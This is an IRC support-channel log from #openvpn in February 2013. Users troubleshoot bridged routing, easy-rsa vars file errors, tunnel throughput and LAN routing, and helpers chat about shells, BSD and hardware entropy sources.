16:35 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has joined #openvpn
16:44 < neilhwatson> I have a problem with my bridge mode VPN. All previous checks with folks on this channel indicate that the tunnel is connected. The tunnel routes properly via my ISP to maintain itself. The tunnel is supposed to become the default route. I think that this may be where the problem lies. Once the tunnel is connected no traffic is routed out, on any interface. A tcpdump on interface 'any' shows no traffic when
16:44 < neilhwatson> https://gist.github.com/neilhwatson/5025038
16:44 <@vpnHelper> Title: openvpn configs (at gist.github.com)
16:46 < pekster> Your message got cut off after "shows no traffic when"
16:46 < pekster> (missing splitlong.pl if you're an irssi user)
16:47 < neilhwatson> Once the tunnel is connected no traffic is routed out, on any interface. A tcpdump on interface 'any' shows no traffic when I ping 8.8.8.8.
16:47 < pekster> What is that routing output from? the client?
16:48 < neilhwatson> Yes
16:48 < pekster> Why are you using a bridge on the client? What's the network setup
16:48 < pekster> And where is tap0 in all of this? Is that actually bridged to something?
16:49 < neilhwatson> tap0 is attached to br0
16:49 < pekster> huh?
16:49 < pekster> No, don't do that
16:50 < pekster> Also, you're somehow missing the host-route (/32) to the VPN server's IP via your default gateway
16:50 < pekster> Unless you've mistakenly replaced it with over-zealous hiding of your IPs on line 16
16:50 < pekster> (which is why this kind of replacement is bad and makes life really hard if you want help and don't know what you're doing when you hide IPs)
16:51 < pekster> tap0 is a virtual address. It does *not* belong on a bridge on the client-side like that
16:53 < neilhwatson> My mistake. I will change tap0
16:54 < pekster> You don't need any client bridge unless you're actually bridging them. Chances are you can just undo all the br0/br1 stuff and go back to direct eth0/eth1/whatever connections
16:55 < pekster> Only the server needs tap0 & the physical iface on a bridge in a bridged setup
17:00 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Quit: ZNC - http://znc.sourceforge.net]
17:00 -!- p3rror [~mezgani@41.249.25.162] has joined #openvpn
17:04 -!- kantlivelong [~kantlivel@47.23.189.90] has joined #openvpn
17:05 -!- marksaitis [~marksaiti@86.28.107.165] has joined #openvpn
17:06 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has quit [Read error: Operation timed out]
17:07 -!- marksaitis [~marksaiti@86.28.107.165] has quit [Remote host closed the connection]
17:07 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit [Ping timeout: 256 seconds]
17:08 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn
17:08 -!- mode/#openvpn [+o plaisthos] by ChanServ
17:14 -!- jamesbond-4711 [~jamesbond@unaffiliated/jamesbond-4711] has left #openvpn ["Leaving"]
17:19 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has joined #openvpn
17:23 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 246 seconds]
17:25 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn
17:29 < neilhwatson> Thanks pekster. You've been very patient with me. Routing is working now.
17:39 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
17:43 -!- JSharpe [~JSharpe@10-253-3-31-anc.floodtel.net] has quit [Quit: Leaving]
17:46 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Ping timeout: 276 seconds]
18:09 -!- [fred] [~fred@konfuzi.us] has quit [Ping timeout: 246 seconds]
18:09 < neilhwatson> Is anyone using Openvpn through Rogers in Canada? If so, is your tunnel much slower than your pipe? Do you suspect throttling on the part of Rogers?
18:19 -!- [fred] [fred@konfuzi.us] has joined #openvpn
18:20 <@krzee> im not on rogers or in canada, but i have experienced slow-down when tunneling before, its rather normal
18:20 <@krzee> it's part of redirecting your connection over the vpn before it goes to the internet exposed
18:21 <@krzee> that doesnt mean they are not throttling, i have no way to know that… but it may just be normal
18:21 < neilhwatson> From 40Mbps to 5Mbps seems a bit much.
18:21 <@krzee> you tunneling to a server that you can get 40mbps to normally?
18:21 <@krzee> (without openvpn)
18:21 < neilhwatson> 100Mbps
18:21 <@krzee> that wasnt the question
18:22 <@krzee> i didnt ask what connection its on, im asking about your real life xfer speed to the server
18:22 < neilhwatson> Fair point
18:23 <+hazardous> hi krzee
18:23 <@krzee> hi
18:23 <+hazardous> neilhwatson: are you on a 'real' connection or a residential connection? afaik anything encrypted is throttled in some way as an anti torrent defence mechanism
18:23 <+hazardous> at least that goes for bell and bell subsidiaries
18:23 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 245 seconds]
18:26 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
18:27 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
18:27 < neilhwatson> Residential. No one at rogers would confirm or deny throttling on a business subscription which made the premium price off-putting.
18:35 < neilhwatson> confirmed 40Mbps between client and vpn server outside of tunnel :(
18:36 < pekster> Can you repeat that test going directly to the VPN endpoint, not an external host beyond that?
18:36 < pekster> ie: if you did that by doing an scp of a 50M file, to the server, for instance, do that again to the VPN IP going across the tunnel
18:37 <@krzee> exactly ^
18:37 < pekster> It's wise to make it a sufficiently large file too to overcome any initial "burst" upload you get
18:39 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 245 seconds]
18:47 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.]
18:53 -!- kantlivelong [~kantlivel@47.23.189.90] has quit [Ping timeout: 245 seconds]
18:58 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn
19:06 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
19:09 -!- raidz is now known as raidz_away
19:17 -!- bluethundr [~dunphy@ool-4573b723.dyn.optonline.net] has joined #openvpn
19:18 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 245 seconds]
19:19 < bluethundr> hello.. I am trying to install openvpn on centos and when I go to source ./vars it seems that all of the variables in my openssl-1.0.0.cnf file are being treated as commands by the operating system and therefore failing...
19:19 < bluethundr> http://paste.jokefire.com/index.php/view/99801869
19:19 < bluethundr> I was just wondering what I was doing wrong here
19:19 < bluethundr> tx
19:21 < pekster> Possibly a mistake in your vars file when you edited the env-var export lines
19:21 < pekster> Can you paste the vars file you're using?
19:22 < pekster> Or an error with the whichopensslcnf code, possibly
19:23 < bluethundr> yeah I can post the vars file tx
19:23 < pekster> (you could try adding a debugging 'echo' command before and after that line to see if that's where the spray of errors occurs)
19:23 < pekster> Those are my 2 guesses
19:23 < pekster> Yea, let's see the vars file, then I'll see if that makes sense next
19:28 < bluethundr> here's the conf file sorry for the delay
19:28 < bluethundr> http://paste.jokefire.com/index.php/view/22005598
19:28 < pekster> The vars file was what I was interested in
19:29 < pekster> the cnf is just the openssl config and doesn't get sourced (or, shouldn't be as it apparently is in your case)
19:29 < bluethundr> oh sorry yeh just realized
19:29 < bluethundr> one sec I'll grab that
19:30 < bluethundr> I didn't edit this file .. perhaps i should
19:30 < bluethundr> http://paste.jokefire.com/index.php/view/66305933
19:31 < bluethundr> also thanks for the clarification
19:31 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit []
19:32 <@krzee> export GREP="grep"
19:32 <@krzee> heh
19:33 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Read error: Operation timed out]
19:34 < bluethundr> heh... nice
19:34 < pekster> bluethundr: Ah, you've incorrectly edited line 29
19:34 < bluethundr> oh thanks for the tip
19:34 < pekster> You either need to double-quote it, or leave it as the stock line which is as follows:
19:35 < pekster> # easy-rsa parameter settings
19:35 < pekster> # NOTE: If you installed from an RPM,
19:35 < pekster> # don't edit this file in place in
19:35 < pekster> # /usr/share/openvpn/easy-rsa --
19:35 < pekster> # instead, you should copy the whole
19:35 < pekster> # easy-rsa directory to another location
19:35 < pekster> # (such as /etc/openvpn) so that your
19:35 < pekster> # edits will not be wiped out by a future
19:35 < pekster> # OpenVPN package upgrade.
19:35 < pekster> # This variable should point to
19:35 < pekster> # the top level of the easy-rsa
19:35 < pekster> # tree.
19:35 < pekster> export EASY_RSA="`pwd`"
19:35 < pekster> #
19:35 < pekster> # This variable should point to
19:35 < pekster> # the requested executables
19:35 < pekster> #
19:35 < pekster> export OPENSSL="openssl"
19:35 < pekster> export PKCS11TOOL="pkcs11-tool"
19:35 < pekster> export GREP="grep"
19:35 -!- mode/#openvpn [+q pekster!*@*] by krzee
19:35 <@krzee> we'll let the flood go by real quick
19:35 <@krzee> :D
19:36 < bluethundr> hehe
19:36 <@krzee> mis-fire, i know
19:36 -!- mode/#openvpn [-q pekster!*@*] by krzee
19:36 < pekster> # it correctly!
19:36 -!- pekster [~rewt@openvpn/community/support/pekster] has left #openvpn [":("]
19:36 -!- pekster [~rewt@openvpn/community/support/pekster] has joined #openvpn
19:36 <@krzee> =]
19:36 * pekster sighs
19:36 <@krzee> the bot doesnt floodkick you either
19:36 < pekster> Apparently I botched my gpm+visual mode in vim
19:36 <@krzee> cause you're speshul
19:37 < pekster> So, bluethundr, what you want is to either double-quote that file to use it specifically, or put line 29 back to the stock config which is this:
19:37 < pekster> export KEY_CONFIG=`$EASY_RSA/whichopensslcnf $EASY_RSA`
19:38 < pekster> krzee: Yea, I did what should have been a terminal select, and apparently vim+gpm took over and did a "visual" select (which doesn't get put in the local clipboard.) That left my clipboard full of the paste content I put into my editor. Bleh.
19:38 < pekster> I should probably find an irssi plugin that double-checks on >3 lines of paste or somethin
19:39 <@krzee> meh it happens
19:39 < pekster> Besides that, I really like my new .vimrc file :P
19:39 <@krzee> better here than some channel you dont frequent giving help in =]
19:40 < bluethundr> will do thanks
19:41 <@krzee> bourne shell is so much more tedious than bash
19:41 < bluethundr> pekster: cool thanks for the advice
19:41 < pekster> Yea, I do bourne-esque development for openwrt, and sometimes I forget how nice bash is until I don't have it
19:41 < pekster> bluethundr: np, sorry about spamming the channel with my missed copy of the one-liner you needed
19:42 < pekster> krzee: I've also grown fond of zsh's "multios" feature. It can do fun stuff like this: echo "hello world" > >(md5sum) > >(sha1sum)
19:42 < pekster> So it basically takes stdout and clones it to multiple targets in parallel
19:43 < bluethundr> hey that's fine. but you should've used my pastebin instead lololol
19:43 < pekster> Granted you can redirect fd's in bash too, but it looks really ugly
19:45 <@krzee> even with fd's youd need tee in bash
19:45 <@krzee> to send it to multiple at once
19:45 <@krzee> afaik
19:46 < pekster> Well, you can duplicate, so make say fd4 a clone of fd1, then do background processing on fd1 & fd4, but it just looks ugly
19:46 <@krzee> oh yes true
19:46 < pekster> zsh does that a lot cleaner. And until bash4, zsh had associative arrays that bash3 didn't, but that advantage is moot now
19:47 <@krzee> they're handy
19:47 < pekster> I do hate hopping between complex bash and zsh development due to quirks like some indexing is 0 vs 1 based depending on the shell used. That's a great way to mess with one's head
19:47 <@krzee> ive used them a bit
19:47 <@krzee> ya ive never actually played with zsh
19:48 < pekster> zsh is my preferred interactive shell, although I tend to script in bash unless I actually need zsh features
19:48 < pekster> (partly for portability, and partly so my brain doesn't hurt when editing my vs system scripts)
19:49 <@krzee> i thought you use freebsd
19:49 < pekster> Nope, not really a BSD guy, although I don't mind NetBSD if one actually needs a Unix
19:50 <@krzee> now that you say that i remember you having said it before
19:50 < pekster> NetBSD had a decent userland, but I still don't like the BSD kernel philosophy
19:50 <@krzee> i love the (free?)bsd hier philosophy
19:50 <@krzee> i dunno if the other bsd's follow it or not, but freebsd's hier is what i feel is right
19:51 <@krzee> http://www.freebsd.org/cgi/man.cgi?query=hier&sektion=7
19:51 <@vpnHelper> Title: hier(7) (at www.freebsd.org)
19:52 < pekster> Last $job NetBSD routers were used everywhere except at the DC core routing, and it generally worked fine. One day we were overflowing state tracking for the office NAT router, and we "couldn't" fix it as it required a reboot to the new kernel for increased state, and a reboot would drop the stateless (thus "working") VoIP calls sales had
19:52 < pekster> Linux does that via a simple sysfs node, so no reboot
19:53 -!- kantlivelong [~kantlivel@47.23.189.90] has joined #openvpn
19:53 < pekster> Stuff like that causes me to shake my head at the monolithic design
19:56 < pekster> Oh, flood-protection fixed; apparently I didn't copy over the max_msgs variable from my other network stanza
19:57 -!- kantlivelong [~kantlivel@47.23.189.90] has quit [Ping timeout: 245 seconds]
20:05 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn
20:36 -!- [1]JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn
20:38 -!- p3rror [~mezgani@41.249.25.162] has quit [Read error: Operation timed out]
20:38 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Ping timeout: 255 seconds]
21:14 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Remote host closed the connection]
21:32 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 245 seconds]
21:38 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 276 seconds]
21:51 -!- kantlivelong [~kantlivel@47.23.189.90] has joined #openvpn
22:04 -!- dougquaid [~brian@pool-173-72-191-174.clppva.fios.verizon.net] has quit [Ping timeout: 252 seconds]
22:07 -!- dougquaid [~brian@173.72.191.174] has joined #openvpn
22:09 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has joined #openvpn
22:10 -!- zach [~zach@nat-192-95-29-123.bhs1.montreal.qbc.ca.nuked.co] has quit [Ping timeout: 240 seconds]
22:14 -!- dougquaid [~brian@173.72.191.174] has quit [Quit: Leaving]
22:17 -!- zach [~zach@nat-192-95-29-123.bhs1.montreal.qbc.ca.nuked.co] has joined #openvpn
22:47 < kantlivelong> does openvpn LZO+BF-CBC require a lot of cpu power?
22:47 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has quit [Ping timeout: 252 seconds]
22:47 -!- rob0 [rob0@harrier.slackbuilds.org] has joined #openvpn
22:47 -!- rob0 [rob0@harrier.slackbuilds.org] has quit [Changing host]
22:47 -!- rob0 [rob0@pdpc/valentine/postfixninja/rob0] has joined #openvpn
23:01 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
23:11 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
23:15 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Excess Flood]
23:16 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
--- Day changed Tue Feb 26 2013
00:04 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
00:11 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Quit: ZNC - http://znc.in]
00:16 -!- Teck7__ is now known as rfxn
00:48 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has quit [Quit: nonotza]
00:49 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
00:49 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
01:12 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
01:16 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 245 seconds]
01:20 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
01:30 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
01:36 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 245 seconds]
01:39 -!- Netsplit *.net <-> *.split quits: VunKruz, meepmeep
01:40 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit []
01:40 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
01:43 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn
01:46 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn
01:51 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn
01:52 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat]
01:59 -!- sh_t [~sht@176.222.238.158] has joined #openvpn
02:00 < sh_t> hi everyone. i'm looking to use a vpn on top of a vpn. the first vpn is a tun and the second (which will connect over the first) is tap. i've been advised that i will probably run into mtu sizing problems. can anyone suggest how to size each accordingly? I don't have control over the second tap link's server settings because it's a subscribed service.
02:03 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Quit: off to do some thoughtcrime]
02:07 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
02:21 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 245 seconds]
02:35 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
02:36 -!- zz_AsadH is now known as AsadH
02:37 -!- AsadH is now known as zz_AsadH
02:49 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 272 seconds]
02:56 -!- dazo_afk is now known as dazo
03:03 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
03:17 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 245 seconds]
03:17 -!- Suterusu1 [~EyeR@81.152.141.152] has joined #openvpn
03:23 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Ping timeout: 252 seconds]
03:28 -!- master_of_master [~master_of@p57B5596B.dip.t-dialin.net] has quit [Ping timeout: 276 seconds]
03:30 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
03:31 -!- Suterusu1 [~EyeR@81.152.141.152] has quit [Ping timeout: 245 seconds]
03:40 -!- mnice [~jdoe@84.242.118.58] has left #openvpn []
03:40 -!- knobo [~user@ti0125a380-1018.bb.online.no] has joined #openvpn
03:40 < knobo> To make vpn start at boot, do I need to make certificates without password then?
03:41 < EugeneKay> For unattended, yes.
03:43 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 245 seconds]
03:44 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn
04:01 -!- Suterusu1 [~EyeR@81.152.141.152] has joined #openvpn
04:03 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 272 seconds]
04:11 -!- sqwerty [~sqwerty@rubberductions.plus.com] has joined #openvpn
04:11 -!- sqwerty [~sqwerty@rubberductions.plus.com] has quit [Changing host]
04:11 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn
04:15 -!- baobei [~baobei@180.155.14.35] has joined #openvpn
04:16 < baobei> whats the server side directive to allow sharing of client certs
04:17 < EugeneKay> !dupe
04:17 <@vpnHelper> "dupe" is (#1) see --duplicate-cn in the manual (!man) to see how to allow multiple clients to use the same key (NOT recommended) or (#2) instead, use !pki to make a cert for each user
04:17 -!- Suterusu1 [~EyeR@81.152.141.152] has quit [Ping timeout: 245 seconds]
04:17 < baobei> thanks
04:18 < baobei> using that i dont need to add anything to the client config?
04:19 -!- baobei [~baobei@180.155.14.35] has quit [Client Quit]
04:22 < EugeneKay> Nope.
04:27 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: No route to host]
04:27 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
04:37 -!- p3rror [~mezgani@41.140.231.29] has joined #openvpn
04:38 -!- ade_b [~Ade@109.46.114.162] has joined #openvpn
04:38 -!- ade_b [~Ade@109.46.114.162] has quit [Changing host]
04:38 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
04:41 -!- [Xaronic] is now known as deadmoose
04:43 -!- deadmoose is now known as [Xaronic]
05:23 -!- novaflash is now known as novaflash_away
05:23 -!- novaflash_away is now known as novaflash
05:50 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
05:50 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
05:58 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
05:58 -!- Mcloven [~Mcloven@203.122.218.215] has joined #openvpn
06:03 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
06:04 -!- Mcloven [~Mcloven@203.122.218.215] has quit [Read error: Connection reset by peer]
06:04 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 245 seconds]
06:16 -!- ade_b [~Ade@ip-109-84-70-107.web.vodafone.de] has joined #openvpn
06:16 -!- ade_b [~Ade@ip-109-84-70-107.web.vodafone.de] has quit [Changing host]
06:16 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
06:27 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
06:28 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 255 seconds]
06:28 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
06:36 -!- voidnecron [~voidnecro@unaffiliated/necron] has joined #openvpn
06:36 < voidnecron> Hi
06:37 < voidnecron> Anyone having or knows about issues with Win8?
06:37 < voidnecron> once in a while it crashes on connecting
06:37 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Quit: Reconnecting]
06:37 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn
06:41 -!- Mcloven_ [~Mcloven@203.122.218.215] has joined #openvpn
06:42 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
06:44 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 240 seconds]
06:46 -!- wykydtron [tassadar@persephone.darkness-reigns.net] has quit [Ping timeout: 264 seconds]
06:53 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
07:06 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn
07:08 -!- wykydtron [tassadar@persephone.darkness-reigns.net] has joined #openvpn
07:17 -!- Mcloven_ [~Mcloven@203.122.218.215] has quit [Ping timeout: 245 seconds]
07:18 -!- cherwin [~cherwin@ip4da6274e.direct-adsl.nl] has quit [Quit: leaving]
07:20 < pcdummy> Can't get my routes up to ping the clients behind my openvpn server :/
07:21 < pcdummy> This is the server conf: http://pastie.org/6340959 and this is the client's: http://pastie.org/6340967
07:22 < pcdummy> I can ping the OpenVPN Server (10.8.0.1) and its private IP (192.168.142.1) but not the other clients ( 192.168.142.2 for example )
07:23 < pcdummy> http://pastie.org/6340974 <-- ping to .2
07:34 -!- ade_b [~Ade@ip-109-84-184-98.web.vodafone.de] has joined #openvpn
07:34 -!- ade_b [~Ade@ip-109-84-184-98.web.vodafone.de] has quit [Changing host]
07:34 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
07:45 < pekster> pcdummy: You don't need the route statement on line 23 on the client config since the server pushes it (it doesn't hurt, but it's simply not necessary)
07:45 < pekster> pcdummy: My guess is you didn't set up the return-routing on the server's LAN; is the VPN server also the default gateway there?
07:45 < pekster> !serverlan
07:45 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
07:52 < pcdummy> pekster: i think libvirt is the "problem"
08:14 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 246 seconds]
08:15 < pcdummy> pekster: now i moved the OpenVPN into the lan, still can't ping other hosts except the VPN Server :/
08:16 < pcdummy> i followed that flowchart.
08:16 < pekster> I never got an answer to my earlier question about the server network gateway and the VPN server
08:17 < pekster> You likely have a firewall or routing problem
08:17 < pekster> firewall on the VPN server or the LAN's gw, or a routing issue on the gw
08:18 < pcdummy> pekster: its a single server machine running KVM on it, now the ovpn is running in a host only "virtual network"
08:19 < pekster> Right, but you need a return-route
08:19 < pekster> If there is no default gateway, packets cannot "get back" to the VPN network
08:20 < pekster> A "host only" network doesn't tend to have a gateway. It's a standalone, non-routable LAN. You need it to be routable if you expect packets to be routed to/from the network, or I suppose you could SNAT everything going in and it'll appear to inside machines as if the VPN server (presumably in the "host only" network itself) sent all the traffic
08:21 < pekster> See yourself where the LAN system wants to send the return packet with 'ip route get 10.8.0.6' or such
08:22 < pcdummy> would love to SNAT ovpn
08:23 < havoc> interesting: http://www.entropykey.co.uk/
08:23 <@vpnHelper> Title: Simtec Electronics Entropy Key: USB True Random Number Generator (at www.entropykey.co.uk)
08:23 < pekster> It's just silly to do that for rfc1918 space where you have as much as you could want. It makes sense on the IPv4 Internet where we're short addresses, but not on internal networks generally
08:24 < pekster> havoc: Yea, entropy generation is an issue for systems like webservers doing a lot of https transactions in short order as every one eats entropy
08:25 < havoc> I kindof crossposted to #proxmox too
08:25 < pekster> If an app actually needs /dev/random (not the non-blocking and less-secure urandom device) it'll block and cause connections to be delayed
08:25 < havoc> it'd be real useful for topping of entropy pools on VMs
08:25 < havoc> s/of/off/
08:26 < pekster> It's "less" of an issue for openvpn since one doesn't generally get that kind of churn on entropy from normal openvpn usage. I'm discounting silly cases where you re-key the static keys every 15 seconds per client or something
08:26 < havoc> yeah
08:26 < pekster> Beyond testing rekeys, that's just stupid
08:26 < havoc> but I figured some here might still find it interesting :)
08:26 < pekster> Yup, hardware entropy is a nifty solution to the problem
08:27 < pekster> I also have a downloaded collection of 16k files from random.org. I tend to use them to pull out 64-bit numbers to seed my minecraft worlds ;)
08:27 < havoc> heh
08:28 < havoc> that entropy key is neat because it can be added to existing entropy pools
08:28 < havoc> and you can use more than one
08:29 < havoc> especially nice/handy if you have one of those mobos w/ one or two USB plugs on the mobo itself
08:29 < pekster> Yea, it's got great uses on embedded hardware (assuming proper OS support) for things like the rPi and such
08:30 < pekster> There's a great article I like to refer to that discusses how the Linux kernel in particular has bad entropy on those systems as they lack traditional disk, keyboard, or mouse (the main sources of entropy) and in early-boot there's little-to-no network activity, making entropy dangerously low
08:31 < havoc> and no sound cards either; those are excellent sources of entropy
08:31 < havoc> a little DSP on the mic input, and done
08:32 < havoc> but yeah, you need either truly random (i.e. human) input, or analog input
08:32 < havoc> hard to get that w/ no HID
08:33 < pekster> e.g., I have 2 headless servers at home: one is an app server that runs rtorrent all day long seeding FOSS materials, and the other is an admin box basically idling and doing some syslog collection. The app server has good entropy most of the time since it's got a constant flow of network & disk traffic; not so for the admin box that does very little of either
08:34 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
08:34 < pekster> http://paste.kde.org/681884/
08:34 < pekster> :)
08:35 < havoc> substantial diff there
08:36 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds]
08:49 -!- brute11k [~brute11k@89.249.235.210] has quit [Ping timeout: 255 seconds]
08:49 -!- brute11k1 [~brute11k@89.249.235.210] has joined #openvpn
08:51 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
08:58 < EugeneKay> Webcam, lava lamp.
09:01 <@ecrist> !vend
09:01 <@ecrist> aww
09:02 <@ecrist> we used to have something in there, back in the day
09:04 -!- baobei [~baobei@180.155.14.35] has joined #openvpn
09:07 -!- ade_b [~Ade@ip-109-41-1-25.web.vodafone.de] has joined #openvpn
09:07 -!- ade_b [~Ade@ip-109-41-1-25.web.vodafone.de] has quit [Changing host]
09:07 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
09:08 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
09:28 -!- erich [~erich@host19.duncable.cust.sover.net] has joined #openvpn
09:34 -!- erich [~erich@host19.duncable.cust.sover.net] has quit [Quit: erich]
09:53 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt]
10:03 -!- brute11k1 [~brute11k@89.249.235.210] has quit [Read error: Connection reset by peer]
10:05 -!- baobei [~baobei@180.155.14.35] has quit [Read error: Operation timed out]
10:06 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds]
10:07 -!- baobei [~baobei@101.93.91.186] has joined #openvpn
10:10 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
10:10 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
10:20 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
10:20 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
10:22 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has joined #openvpn
10:25 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit []
10:29 -!- JSharpe [~JSharpe@10-253-3-31-anc.floodtel.net] has joined #openvpn
10:32 -!- baobei [~baobei@101.93.91.186] has quit [Read error: Connection timed out]
10:33 -!- baobei [~baobei@101.93.91.186] has joined #openvpn
10:33 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn
10:34 -!- bjh4 [~bjh4@12.239.198.1] has joined #openvpn
10:37 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn
10:39 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
10:42 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
10:42 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
10:42 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
10:42 -!- mode/#openvpn [+o krzee] by ChanServ
